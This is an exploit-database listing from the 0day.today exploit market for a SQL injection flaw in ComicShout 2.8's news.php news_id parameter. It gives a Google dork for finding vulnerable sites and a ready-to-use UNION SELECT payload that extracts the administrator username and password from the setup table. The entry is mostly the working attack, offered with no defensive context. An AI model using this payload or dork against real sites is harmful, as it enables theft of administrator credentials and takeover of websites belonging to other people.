[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ComicShout 2.8 (news.php news_id) SQL Injection Vulnerability

Author
JosS
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3099
Category
web applications
Date add
31-05-2008
Platform
unsorted
=============================================================
ComicShout 2.8 (news.php news_id) SQL Injection Vulnerability
=============================================================



[+] Info:

[~] Bug found by JosS
[~] EspSeC & Hack0wn!.


[~] Software: ComicShout 2.8
[~] Exploit: Remote SQL Injection [High]
[~] Vuln file: news.php

[~] Dork: "Powered by ComicShout"

[+] Exploit:

[~] /news.php?news_id=[SQL]
[~] 4+union+all+select+0,1,site_admin,site_pass+from+setup/*



#  0day.today [2024-11-16]  #